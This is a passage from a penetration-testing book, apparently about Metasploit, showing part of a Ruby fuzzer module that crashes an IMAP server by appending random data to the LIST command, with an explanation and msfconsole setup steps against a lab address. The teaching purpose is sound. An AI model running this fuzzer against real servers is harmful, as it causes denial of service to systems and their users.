Creating Your Own Exploits
199
res = raw_send_recv(req)
if !res.nil?
print_status(res)
else
print_status(
"Server crashed, no response"
)
break
end
disconnect()
end
end
end
The fuzzer module begins by importing the IMAP and denial-of-service
mixins. Including IMAP gives you the required login functionality, and since
the goal of the fuzzer is to crash the server, this module results in a denial
of service.
At the
fuzz string
(the malformed data we want to send) is set as a random-
ized string of alphanumeric characters with a maximum length of 1024 bytes.
The fuzzer connects and logs into the remote service at , and if it fails to
connect and the loop breaks, you have something worth investigating. The
lack of response by the server might mean that you’ve successfully caused an
exception in the remote service.
At the variable
fuzzed
is set to the random string generated by the
Framework, and the malicious request is built according to the published
exploit code by appending the malicious data to the vulnerable
LIST
com-
mand. If the fuzzer doesn’t receive a response from the server, it prints the
message
"Server crashed, no response"
and quits.
To test your new fuzzer, start up
msfconsole
, load the module, and set its
options as follows:
msf >
use auxiliary/fuzzers/imap_fuzz
msf auxiliary(imap_fuzz) >
show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
IMAPPASS no The password for the specified username
IMAPUSER no The username to authenticate as
RHOST yes The target address
RPORT 143 yes The target port
msf auxiliary(imap_fuzz) >
set IMAPPASS test
IMAPPASS => test
msf auxiliary(imap_fuzz) >
set IMAPUSER test
IMAPUSER => test
msf auxiliary(imap_fuzz) >
set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf auxiliary(imap_fuzz) >